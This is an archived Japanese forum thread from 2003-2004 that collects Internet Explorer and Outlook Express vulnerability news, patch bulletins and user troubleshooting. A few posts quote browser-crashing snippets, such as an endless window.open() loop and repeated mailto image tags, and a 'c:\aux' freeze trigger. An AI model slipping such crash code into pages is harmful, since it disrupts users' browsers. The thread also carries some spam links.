壊れ始めているよ〜だ! SOS, SOS, , ,
526名無しさん@お腹いっぱい。:03/06/17 13:29
>>525
Win98は今月末までのサポート。
Windows板http://pc2.2ch.net/win/

マウスの件はマウスを買い換えろ。壊れてるだけ。
念のためウィルススキャンしろ。
527名無しさん@お腹いっぱい。:03/06/17 13:40
おっ、Piggybackで止まった
528_:03/06/17 13:57
>>522
>>459で既出のサンプルページだろ。
>>520も一言説明して貼るべきとは思うが・・・。
直リンもやめるべきだろう。
>>520のメール欄を見る限りは確信犯。
531名無しさん@お腹いっぱい。:03/06/17 23:34
age
532名無しさん@お腹いっぱい。:03/06/18 09:59
IEの新しい累積パッチにはいくつかの注意点,既に適用したユーザーも再確認を
 既知のホールを解消できるものの不完全,ブラウザ・クラッシャは回避できない
 今週のSecurity Check [Windows編] (第97回,2003年6月18日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030617/1/
Microsoft的にはブラクラは優先的に対処すべきセキュリティホール
として扱われていないから仕方ないだろ
while (1) { window.open() }とか
<img src="mailto:sage">…(えんえんと続く)とか
<input type>とか
http://msgs.securepoint.com/cgi-bin/get/bugtraq0303/107.html とか
単にブラウザが落ちるだけのものならいくらでもある
534名無しさん@お腹いっぱい。:03/06/19 00:16
あげ
535n:03/06/19 00:21
☆頑張ってまーす!!☆
http://yahooo.s2.x-beat.com/linkvp/linkvp.html
>>533
OSごと落ちる9x系
MS的には「昔そんなのありましたっけ?さっさとXP買ってね」

まあ優先は他の穴だとは思うけどさ
537名無しさん@お腹いっぱい。:03/06/19 21:34
>>526
どうもありがとう。行って来ました。
Win2k/XPなら制限付きユーザーでブラウズすると、
IEが危険とされる理由のひとつである、「勝手にバイナリを
ダウンロードして実行したりインストールしたりする機能」が
署名の有無やゾーンにかかわらず完全に無効になるから
かなり安全になる。
539名無しさん@お腹いっぱい。:03/06/20 00:30
age
540名無しさん@お腹いっぱい。:03/06/22 20:27
あげ
  _, ._
  ( ゚ Д゚)
  ( つ O   ガシャ
  と_)_)  __
       (__()、;.o:。
         ゚*・:.。
542名無しさん@お腹いっぱい。:03/06/25 19:27
age
543名無しさん@お腹いっぱい。:03/06/26 05:09
IE/OEとは直接関係ないが、
「MS03-021: Windows Media Player の問題により、メディアライブラリがアクセスされる (819639) 」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-021ov.asp
●対象となる製品
・Microsoft Windows Media Player 9 Series
・Microsoft Windows Media Player on Windows Server 2003
●以下の製品はこの問題の影響を受けません。
・Microsoft Windows Media Player 6.4
・Microsoft Windows Media Player 7.1
・Microsoft Windows Media Player for Windows XP
544名無しさん@お腹いっぱい。:03/06/26 23:24
IEブラウザに新たな欠陥:米マイクロソフトは「調査中」
http://japan.cnet.com/news/ent/story/0,2000047623,20057501,00.htm
545IE5.5SP2日本語版:03/06/27 00:44
IE5.5SP2のダウンロードは終了したはずだが、
Internet Explorer 5.5 SP2 ダウンロード提供終了のご案内
http://www.microsoft.com/japan/ie/downloads/recommended/ie55sp2/default.asp
なぜかダウンロードが復活しているので、必要な方はいまのうちにどうぞ。
http://www.microsoft.com/downloads/details.aspx?FamilyID=0a50996b-deb9-4a46-81da-abef1ebbd08a&DisplayLang=ja
>>545
ODNのCD-ROMを店からもらってきた方が後々いいかもしれない
>>545
Meのサポートが終了するまでという名目で復活させたようだが
やはりMicrosoft VMが入ってるからというのが真相だろうな
そういや控訴審はどうなったんだ? 今月あたり判決が出るはずなんだが
http://www.zdnet.co.jp/news/0306/27/nebt_18.html
判決出た。搭載命令は撤回
米Sunと米MSのJava訴訟,Java搭載の仮命令は差し戻し
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030627/6/
>>545
ie5setup.exeはダウソできたものの、Download Siteに接続するとすぐエラーになってしまう。
cab一式はサーバから削除されてしまってるんじゃないか?
>>550
そうか。じゃ、やっぱりODNのCD-ROM貰ってくるしかないか…
>>551
駅に置いてあるやつでいいの?
553名無しさん@お腹いっぱい。 :03/06/28 19:39
WIN98だが、もうすぐアップデートできなくなるらしい。
DirectX 9.0a ?(DirectX 9.0a には、セキュリティとパフォーマンスを向上するための
更新と、DirectX テクノロジのすべてにわたる新機能が含まれていますという説明の
もの)、ダウンロードしておいたほうが良い?
ダウンロードしてなにか問題がなかったでしょうか? あったような?
>>553
( ゚д゚)ポカーン
555名無しさん@お腹いっぱい。:03/06/28 20:00
私のところにメールが頻繁に届きます。
本当に簡単な仕事ですか?と聞かれますので
答えました。簡単なビジネスです。1日の労働時間は
2時間です。皆さんは0円から行い、
最終的に年商3000万円を目指してください。
ちゃんと教えます。稼ぎ方をおしえますので安心してください。
http://www.c-gmf.com/farewell/box08.htm
>>553
Windows98 はあと3、4年ぐらい不滅です!Part2
http://pc2.2ch.net/test/read.cgi/win/1055040506/l50
557名無しさん@お腹いっぱい。:03/07/02 11:22
EdMax, WeMail32など複数のWindowsメーラにセキュリティホール
http://slashdot.jp/security/
[memo:6145] 複数のメールソフトに不適切なセキュリティゾーンが適用される欠陥
http://memo.st.ryukoku.ac.jp/archive/200307.month/6145.html
OEを糞といってた諸君、一言どうぞ。
559名無しさん@お腹いっぱい。:03/07/04 06:15
Outlook Express6SP1を使っています。
ツール<オプション<メンテナンス<最適化で以下のメッセージが表示されました。
いままで一度も出たことがありません。
このメッセージについて情報をお持ちの方はいらっしゃいませんでしょうか。
Outlook Expressのフォルダは別ドライブに移動してありますが、
移動後もこれまではうまく動いたと記憶しています。

環境はxpsp1 
関係ありそうなアプリはVB2003、ZoneAlarm(フリー版3.7.193)でしょうか。
ちょっと気持ちが悪いので情報提供方よろしくお願いします。

---------------------------
Outlook Express
---------------------------
Outlook Express またはほかのアプリケーションがこのフォルダを使用しています。
---------------------------
OK キャンセル
---------------------------
560559:03/07/04 06:19
追加です。
アプリとしては上記のほか、
SpywareBlaster(スパイウエアブラスター)でオールチェック
Spybot(スパイボット)で免疫化適用
AdAware(アドアウエア)で定期チェック です。
よろしくお願いします。
>>558
HTMLプレビューを許可した状態なら起きるというので、わざと切り替えない限りはOEよりは可能性は低い。

(;´Д`)
563名無しさん@お腹いっぱい。:03/07/04 22:28
>>559
最適化中に送受信が入るとそのメッセージが出る。
564名無しさん@お腹いっぱい。:03/07/05 00:11
>>561
OEはだいぶ前に対策済みでプレビュー許可しても発生しませんが、何か?
OEが塞いだ後も指摘されるまで放置してたという事は、OEが塞いだ他の穴も
放置されてる可能性が高いという事ですな。
565559:03/07/05 15:37
>>563
やはりそうですか。そんな感じはしていました。
受信は当時1分間隔でチェックに設定していました。
それにしても、受信を完了させた直後でも上記の現象が出ていました。
現在はなぜか治りましたが、未知のスパイかウイルスかその類を
知らずに飼育していたのかもしれないと思って、
気持ち悪くて質問しました。検索はかなりしました。
現象が再発したらまたお尋ねしたく思います。
566名無しさん@お腹いっぱい。:03/07/05 18:54
>>556

おお、ありがとう。
私は普段はセキュリティ板しか見ていないので、、(反省)。
亀レスになってしまいました(汗)。
567名無しさん@お腹いっぱい。:03/07/08 00:33
>>557対応状況
Winbiffユーザーの皆様へ重要なお知らせ
http://www.orangesoft.co.jp/Winbiff20/secholl_20030317.html
ドラえもんメールアップデートモジュール公開のお知らせ
http://www.doraemon-mail.com/support/update.html
WeMail32 Ver.2.10beta1をリリースしました
http://www.ntes.co.jp/WeMail/whatsnew.html
EdMax更新履歴
http://www.edcom.jp/edmdes1.html
EdMaxフリー版更新履歴
http://www.edcom.jp/edmfree.html
問題点は、OEは対策されるまで公表されない場合が多い。
他のメーラはOEで公表後、後追いでの対策になる。
> OEは対策されるまで公表されない場合が多い。
あたりまえだろ、対策前に公表されたらアタックされるぞ
まぁ、公表されても見ないあほが多いけどな。
571名無しさん@お腹いっぱい。:03/07/08 11:44
572名無しさん@お腹いっぱい。:03/07/08 13:47
>>571
Windows ME + IE 6 SP1でも、アドレスバーに c:\aux と入力して
enter すると IE 6 SP1がフリーズした。
573(;´Д`):03/07/08 14:33
(;´Д`)感動した
http://homepage3.nifty.com/coco-nut/
574名無しさん@お腹いっぱい。:03/07/08 21:49
>>571-572
Internet Explorer 6が「c:\aux」でフリーズするバグ
http://www.zdnet.co.jp/enterprise/0307/08/epn16.html
575名無しさん@お腹いっぱい。:03/07/10 15:52
Windowsに3種類の深刻なセキュリティ・ホール,すべてのユーザーが対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030710/3/

(1)HTML コンバータのバッファ オーバーランにより,コードが実行される(823559)(MS03-023)
(2)Windows のバッファ オーバーランによりデータが破損する(817606)(MS03-024)
(3)ユーティリティ マネージャによる Windows メッセージ処理の問題により,権限が昇格する(822679)(MS03-025)
576_:03/07/10 16:29
577あい:03/07/10 20:31
578名無しさん@お腹いっぱい。:03/07/10 23:57
>>575
不具合報告あり。
windows updateしたときに上げるスレ 6
http://pc2.2ch.net/test/read.cgi/win/1057833448/l50
579名無しさん@お腹いっぱい。:03/07/11 15:12
WebブラウザOperaにサービス拒否攻撃を受ける新しい弱点
http://itpro.nikkeibp.co.jp/free/NT/WinSecurity/20030710/1/
>>579
関係ないだろ、スレのタイトル読めない?
>580
脳みそがクラックされてるから仕方ない
HTML コンバータのバッファ オーバーランにより、コードが実行される
http://www.microsoft.com/japan/technet/security/bulletin/MS03-023.asp
厳密にはIEやOEのセキュリティホールではないが、
喰らうタイミングがIEでWebページを見たときやOEでHTMLメールを
開いたときだから貼っとく。
>>579-581
IE/OEの代替でOpera勧める人がいるから、貼っといても無駄ではないと思う。
>>582はたぶんalign buffer overflowの修正だ。
http://www.pivx.com/larholm/unpatched/
「スクリプトによる貼り付け処理」を無効にすることで回避できるって書いてるし
>>583
だったらOperaのスレでやってくれ。
ここはIE/OE使う人のためのスレ。
586山崎 渉:03/07/15 11:07

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄
保守
588名無しさん@お腹いっぱい。:03/07/15 17:02
>>585
IE/OE使う人だけのためのスレじゃなくて、
より安全なブラウザ・メーラを建設的に話すスレ>>1でもあったんじゃない?
IE/OEの話題がメインだとしても。
1 July 2003: There are currently 19 unpatched vulnerabilities.
http://www.pivx.com/larholm/unpatched/
↑Unpatched IE security holes
>>588
IEコンポーネントの話ならともかく
Opera自体については完全にスレ違い。
そういったことはOperaのスレッドでどうぞ。
5921:03/07/15 23:36
いつのまに"IE/OE使う人のためのスレ"になったんだ…
>>592
Operaの話題はOperaのスレでやれってことでしょ?
それとスレは君の私有物ではないよ
セキュリティパッチ情報集積所でも立てるか
漏れも全部一緒のほうがありがたい
http://www.microsoft.com/japan/technet/security/fixedhome.asp
しかし、わかりにくいところにあるなw

「MS03-030: DirectX の未チェックのバッファにより、コンピュータが侵害される(819696)」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-030ov.asp
598???:03/07/24 18:48

期間限定!もうお目にかかれない!

http://alink3.uic.to/user/angeler.html
http://altba.com/bakera/hatomaru.aspx/ebi/genre/00490045
>XML の CDATA 区間の中に object を書かれると、何故か「マイコンピュータ」ゾーンの
>セキュリティレベルで実行されてしまうようです
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020301_ie

これってもう対策されたんだっけ?
600げっっとーーーーーおぉ!!
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ
hage
>>599
とっくに対策されてるがそこに書かれている対処自体は
実行したほうがいい。
面倒ならWindows Update以外は常に制限ユーザーでIEを使え
604名無しさん@お腹いっぱい。:03/08/13 14:14
いろいろ読ませてもらったけど、つまるところ
OEであれIEコンポーネント使用メーラーであれ、
IEと連携しないように、すべてのメッセージをテキスト形式で受信すれば
何ら問題ないわけですね。
>>604
違う。セキュリティホールを考慮してない。
すべてテキスト形式で受信するなら
IEコンポーネントいらないじゃん
607名無しさん@お腹いっぱい。:03/08/15 20:12
>>607
メーラー作者は(゚д゚)ウマーか
609山崎 渉:03/08/15 22:26
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン
(・3・) エェー
IEに「緊急」の脆弱性、累積パッチリリース

http://www.zdnet.co.jp/enterprise/0308/21/epn02.html
Windows XP Service Pack 1 適用のお願い
- Windows XP 初期出荷版(SP1 未適用製品)向け修正プ ログラム提供終了のお知らせ
更新日: 2003 年 9 月 5 日
http://www.microsoft.com/japan/windowsxp/endofgold.asp
613名無しさん@お腹いっぱい。:03/09/11 10:19
○「MS03-039: RPCSS サービスのバッファ オーバーランによりコードが実行され
る (824146)」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-039ov.asp

○Internet Explorer 用の累積的な修正プログラム (822925) (MS03-032)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-032.asp
今回の更新内容
このセキュリティ情報ページを更新し、このセキュリティ情報で提供された
修正プログラムが 「オブジェクト タグの脆弱性」 (CAN-2003-0532) を適切に
修正しないという報告についての情報を追加しました。

○Windows カーネル メッセージ処理のバッファ オーバーランにより、
権限が昇格する (811493) (MS03-013)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-013.asp

○RPC インターフェイスのバッファ オーバーランによりコードが実行される
(823980) (MS03-026)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-026.asp
614名無しさん@お腹いっぱい。:03/09/11 13:34
IEのパッチに問題発覚,適用しても解消で きないセキュリティ・ホールが存在
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030909/1/

Windowsにまたもや“超特大”のセキュリ ティ・ホール,すぐにWindows Updateの実施を
第2,第3の「Blaster」ワームが出現する恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030911/1/
致命的な奴が8つも追加…
http://www.pivx.com/larholm/unpatched/
616名無しさん@お腹いっぱい。:03/09/20 00:57
617名無しさん@お腹いっぱい。:03/10/04 19:10
MS03-040: Internet Explorer 用の累積的な修正プログラム (828750)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-040ov.asp
618名無しさん@お腹いっぱい。:03/10/05 23:26
マイクロソフト、IE 5.01以後が対象の緊急の脆弱性「MS03-040」
http://internet.watch.impress.co.jp/cda/news/2003/10/04/654.html

米MS、とんだお粗末-重大な脆弱性用のパッチが役に立たず
http://japan.cnet.com/news/ent/story/0,2000047623,20060815,00.htm
619名無しさん@お腹いっぱい。:03/10/06 17:07
IEに危険なセキュリティ・ホール,
WebページやHTMLメールを見るだけで被害を受ける

今回の累積パッチでは,過去のパッチでふさげなかった
セキュリティ・ホールも修正

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031005/135316/
620名無しさん@お腹いっぱい。:03/10/17 09:20
後を絶たないIEのセキュリティ・ホール,設定変更などで“自衛”を
続々見つかるパッチの不具合,パッチ未公開のホールを狙うウイルスも
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031014/1/
「ネットにつなぐだけで攻撃を受ける」――第三の“超特大”セキュリティ・ホールを解説する
Exploitが既に公開,パッチを適用してもメッセンジャ サービスは無効に
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031028/1/

IE/OEと関係ないのでsage
622名無しさん@お腹いっぱい。:03/11/08 06:27
IEを起動するとthesten.comという外国のアダルトサイトがホームページになっていて、
お気に入りに3つのそのサイトへのリンクが毎回入っています。
履歴やクッキーやゴミ箱の内容など全て消去しても絶対に起動したときに表示されます。

どのたか改善方法を教えてください。
http://pc2.2ch.net/test/read.cgi/pcqa/1067657959/

>>622
ここ逝こうね。
それと、ここで質問する前に、
最低限1から書かれているFAQとか読んで、
書かれていること実行してみて、だめだったら
質問したほうがいいよ。それと、これ、マルチじゃないよね
Internet Explorer 用の累積的な修正プログラム (828750) (MS03-040)

最大深刻度 :緊急

影響を受けるソフトウェア :
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6
Microsoft Internet Explorer 6 for Windows Server 2003

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-040.asp
↑ミス
Internet Explorer 6 SP1 用の累積的な修正プログラム (KB824145)
が出ているので、各自WindowsUpdateされたし。
現時点ではTechNetに情報なし。
626SMTP信号機:03/11/12 03:06
サーバ関連情報レジストリがばれている限り貴方のPCに侵入した自己散布型ウイルスは自分を撒き散らします。
かといってOEの類を使うのを止めるのはしゃくですよね?
だから作りました。
貴方のPCが迷惑メール送信の加害者にならない為に・・・
http://homepage3.nifty.com/tokeon/Eng-B/SMTPmv.html
JavaですからLinuxPCでも動くには動きます。
627名無しさん@お腹いっぱい。:03/11/12 14:27
IEに「緊急」のセキュリティ・ホール,マイクロソフトは累積パッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031112/136355/

MS、WindowsとOfficeの脆弱性修正パッチリリース
http://www.zdnet.co.jp/enterprise/0311/12/epn05.html
米マイクロソフト、米祝日にセキュリティパッチをリリース
http://japan.cnet.com/news/ent/story/0,2000047623,20061917,00.htm
MS03-048 - Internet Explorer 用の累積的なセキュリティ更新 (824145)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp
●影響を受けるソフトウェア
・Microsoft Windows 98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows NT Workstation 4.0
・Microsoft Windows NT Server 4.0
・Microsoft Windows NT Server 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
・Microsoft Windows XP 64 bit Edition
・Microsoft Windows XP 64 bit Edition Version 2003
・Microsoft Windows Server 2003
・Microsoft Windows Server 2003 64 bit Edition
●影響
リモートからのコード実行
629名無しさん@お腹いっぱい。:03/11/12 14:40
>>1
選択肢

(1)Datula、Netscape7.1 Mail、Edmaxなどを使う
630名無しさん@お腹いっぱい。:03/11/12 14:57
部バージョンの「Eudora for Windows」にバッファオーバーフ
ローの脆弱性
http://www.zdnet.co.jp/enterprise/0311/12/epn06.html
q824145.exe /q:a /r:n

これも出来たとはな (´ー`) フッ
誤爆したぜ
633名無しさん@お腹いっぱい。:03/11/19 19:53
IEにパッチを当てるとスクロール操作に不具合,パッチの品質に改めて注意が必要
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20031118/1/

スクロールバーの空白部分をクリックすると画面スクロールが正しく行われない
http://support.microsoft.com/default.aspx?scid=kb;ja;832270
634名無しさん@お腹いっぱい。:03/11/29 20:24
IEに複数のセキュリティ・ホール,対策はアクティブスクリプトを無効にすること
ホールを突くデモ・ページが公開中,最新パッチを適用していても影響を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031128/136983/
635名無しさん@お腹いっぱい。:03/11/30 01:40
Internet Explorer System Compromise Vulnerabilities
http://secunia.com/advisories/10289/
Internet Explorerの新セキュリティホールは「極めて危険」
http://www.zdnet.co.jp/enterprise/0311/26/epi02.html

Opera:特定のMIMEタイプを持つデータがユーザーに無許可でダウンロード・実行される問題
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j104
最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど
どうなの?
> 最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど
> どうなの?

まぁ、Windows自体に依存してるからね…。

WindowsがIEにも依存してるし。 <= help等
638636:03/11/30 03:44
>> 637

そうだねー。でも OS が web browser に依存しているというのは。
完全に逆なんじゃないのかなあ?

少なくともセキュリティー関連のものは独自の仕組で
アップデートとか出来た方が安心だと思うのは間違いだろうか。
だからといって完璧ではないだろうけど、若干ましな気がする。
639名無しさん@お腹いっぱい。:03/12/03 14:31
IEを使い続けるリスクを再認識しよう
パッチには複数の不具合,パッチ未公開のセキュリティ・ホールが続出
今週のSecurity Check [Windows編] (第108回,2003年12月3日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031202/1/
640名無しさん@お腹いっぱい。:03/12/11 21:36
IEにURLを偽装できるパッチ未公開の脆弱性が発見される
〜緊急度が低いため、パッチはまだリリースしない(MS取締役東氏)
http://internet.watch.impress.co.jp/cda/news/2003/12/11/1451.html
>>640
ちなみに、Opera7.23ja(3226)だとセキュリティ警告のダイアローグが出る。
642名無しさん@お腹いっぱい。:03/12/12 18:06
IEにURLを偽装できるセキュリティ・ホール,安易なクリックは禁物
セキュリティ・ホールを確認するWebページやHTMLメールが公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031211/137400/

ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/12.html#20031211_IE
>>641
Opera6.06でも警告を確認。
これ、ある意味新ウイルスに使われそうなのに、マイクロソフトは危険度低なのね・・・
644こここ:03/12/13 21:38
JokeVirusってどうやって解除するんですか?
645名無しさん@お腹いっぱい。:03/12/20 03:18
@impoでcss読み込んじゃうなんて何考えてんだろうな
646名無しさん@お腹いっぱい。:03/12/26 06:41

こんにちは。MLM・NB初心者です。
詳しい方や現在もしくは過去MLM・NBをやられていた方の
ご意見が聞きたくてページ作りました。
よろしくお願いします。

つまらない物ですが、お礼の品も用意しておりますので
ぜひ、どうぞ!

   http://gonbea.fc2web.com/
647名無しさん@お腹いっぱい。:04/01/10 22:26
IEに2種類の新たなセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040110/138152/
648名無しさん@お腹いっぱい。:04/01/14 23:22
月例パッチに含まれなかったIEの複数の脆弱性
http://www.itmedia.co.jp/enterprise/0401/14/epn15.html
649名無しさん@お腹いっぱい。:04/01/21 18:24
解消されない“URLの偽装問題”,1月もIEのパッチは公開されず
Mozillaは最新版で対応完了,MDACのセキュリティ・ホールにも注意
今週のSecurity Check [Windows編] (第110回,2004年1月21日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040120/1/
650名無しさん@お腹いっぱい。:04/01/28 19:48
URL偽装にご注意を!―Symantecのウイルス研究者が警告
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20040128/138984/
651名無しさん@お腹いっぱい。:04/01/28 20:53
Microsoft plans to release a software update that modifies
the default behavior of Internet Explorer for handling user
information in HTTP and HTTPS URLs
http://support.microsoft.com/default.aspx?scid=kb;[LN];834489
652名無しさん@お腹いっぱい。:04/01/30 18:33
IEに,ダウンロードするファイル名を偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040129/139103/
653名無しさん@お腹いっぱい。:04/02/01 15:55
>>652
もうなんでもありでつね
654名無しさん@お腹いっぱい。:04/02/02 00:38
IEもうだめぽ
655名無しさん@お腹いっぱい。:04/02/03 04:14
レベル緊急。

MS04-004 - Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)
656名無しさん@お腹いっぱい。:04/02/03 10:05
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894) (MS04-004)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-004.asp
2004 年 2 月のセキュリティ情報 (Windows)
http://www.microsoft.com/japan/technet/security/bulletin/winfeb04.asp
>>656
影響を受けるソフトウェア :
Microsoft Windows NTR Workstation 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerR 2003
Microsoft Windows Server 2003, 64-Bit Edition

テストした Microsoft Windows および Officeコンポーネント :
Internet Explorer 6 Service Pack 1
Internet Explorer 6 Service Pack 1 (64-Bit Edition)
Internet Explorer 6 Service Pack 1 for Windows Server 2003
Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition)
Internet Explorer 6
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.01 Service Pack 4
658名無しさん@お腹いっぱい。:04/02/03 10:17
>>657
Windows 98(SE),Windows Meがないのは、影響がないのではなくて、
サポート終了に伴い評価の対象外になったため。
http://www.microsoft.com/japan/win98/98meExtend.htm
http://www.microsoft.com/japan/win98/98meextendfaq.htm
(有償サポート契約を結んでいない一般ユーザは、
 03年12月31日で98/Meのサポートは終了。)
659名無しさん@お腹いっぱい。:04/02/03 11:11
>>658
>>657には98SE,MEはあがってないけど、個別のパッチのところには
98SE、MEもあがっていて適用可能だね。
http://www.microsoft.com/downloads/details.aspx?FamilyId=70530968-B59A-47C0-90D3-0C884910BC97&displaylang=ja
>システム要件
>サポートされているオペレーティング システム : Windows 2000 Service Pack 2, Windows 2000 Service Pack 3,
>Windows 2000 Service Pack 4, Windows 98, Windows 98 Second Edition, Windows ME, Windows NT, Windows XP
>この修正プログラムは、次のオペレーティング システム用の Internet Explorer に対して適用されます。
>Windows XP SP1
>Windows XP
>Windows Millennium Edition (Windows Me)
>Windows 2000 SP2
>Windows 2000 SP3
>Windows 2000 SP4
>Windows 98 SE
>Windows NT 4.0 SP6A
今回のパッチは良く考えてからインスコした方が良さげ
スクロールはかちゅにも影響してるので直したいのだがw
661名無しさん@お腹いっぱい。:04/02/03 23:34
IE 6の最新パッチにトラブル,記憶させたパスワードが表示されなくなる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139279/
MS04-004 Internet Explorer 6 Service Pack 1 用セキュリティ問題の累積的な修正プログラム
(KB832894)の適用後、記憶したはずのユーザー名とパスワードが表示されなくなる
ttp://support.microsoft.com/default.aspx?scid=http://www.microsoft.com/japan/support/sokuho/default.asp#Record_94

マイクロソフト,IEのセキュリティ・パッチを緊急リリース
URLの“偽装問題”を含む,3種類のセキュリティ・ホールを解消
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139235/
MS、IEの脆弱性に対応の臨時パッチ
http://www.itmedia.co.jp/enterprise/0402/03/epc03.html
IE用の新パッチ発行で電子商取引に混乱の可能性も
http://www.itmedia.co.jp/enterprise/0402/02/epic01.html
662名無しさん@お腹いっぱい。:04/02/04 01:59
そもそもブラウザに記録させるようなPASSに、
PASSの意味はあるのかあと小一時間は問い詰めない。
>>662ワラタ。
665名無しさん@お腹いっぱい。:04/02/05 22:40
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
666名無しさん@お腹いっぱい。:04/02/09 00:42
↓IEの脆弱の部分 下記のソフトで補うことが出来るんだろうか?
このソフト使っている人いたら 教えてね

BB de!!スマートブラウジング Ver.1 
667名無しさん@お腹いっぱい。:04/02/11 21:07
Opinion:IE臨時パッチをめぐる混乱はなぜ起きたのか
http://www.itmedia.co.jp/enterprise/0402/10/epc17.html
668名無しさん@お腹いっぱい。:04/02/18 11:27
漏えいしたWindowsのソースコードから早くもIE 5の脆弱性が発見される
〜リモートから任意のコードを実行可能。IE 6は影響なし
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2118.html
マイクロソフト、複数の脆弱性を攻撃する手口が公開されていると警告
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2125.html
669名無しさん@お腹いっぱい。:04/02/18 11:34
流出したWindowsのソース・コードでIE 5のセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040217/139945/
攻撃コードが既に出現,Windowsの“超特大”級セキュリティ・ホールを解説する
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040217/1/
670名無しさん@お腹いっぱい。:04/02/18 16:13
ソースコード流出がきっかけで指摘された新たなIEの脆弱性、その影響は?
Windows 2000とWindows NT 4のソースコードの一部がインターネットに流出したことが
明らかになってからわずか2日後、そのコードを元に、Internet Explorerの新たな脆弱
性が指摘された。
http://www.itmedia.co.jp/enterprise/0402/18/epn03.html
671名無しさん@お腹いっぱい。:04/02/20 20:01
IEにパッチ未公開のセキュリティ・ホール,攻撃コードも出現している
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040220/140200/
672名無しさん@お腹いっぱい。:04/03/01 16:45
IEのフレーム悪用でパスワード漏れ――iDEFENSEが警告
http://www.itmedia.co.jp/enterprise/0403/01/epic01.html
673名無しさん@お腹いっぱい。:04/03/04 22:01
Windows XP Service Pack 2ベータ版プレビュー(パート2)後編
「Security Center」,IE,OEのセキュリティ機能
http://itpro.nikkeibp.co.jp/members/NT/WinNext/20040302/2/
>673
>Outlook ExpressはHTMLメールから身を守れる
> MicrosoftはOutlook 2003において,HTML形式の電子メール内にある画像
>をブロックし,危険な可能性のある電子メールの添付物(例えば.exeという拡張
>子のファイル)を隔離するという,非常にニーズの高い安全対策を導入した。
>同社はXP SP2でこの機能をOutlook Expressに追加しようとしている。
>>673
>ブラウザのアドオン管理はよくできている
> XP SP2のIEに追加される機能として,「Add-on Management」ツー
>ルがある。これはあなたがプラグインやツールバー,そのほかのご自
>分のシステムにインストールしたIEのアドオンを,リストの形で表示
>させたり,管理したりするのを手助けする。Add-on Managementツー
>ルは,私が知っているところでは,2つの基本機能を備えている。…

>IEの設定はスクリプトによる変更が不可に
> さて,IEに対するセキュリティ面の変更はこれだけに終わらない。
>XP SP2では,IEのウインドウに対してスクリプトによって設定変更を
>加えるのを防げる。
676名無しさん@お腹いっぱい。:04/03/12 17:10
 
677名無しさん@お腹いっぱい。:04/04/03 16:48
URL偽装問題再び――IEとOutlookに
Internet ExplorerとOutlook Expressに、URL偽装が可能な新たな問題が存在することが判明した。
http://www.itmedia.co.jp/enterprise/0404/02/epn07.html
678名無しさん@お腹いっぱい。:04/04/03 19:28
>>677
その上で右クリすれば見破れる。
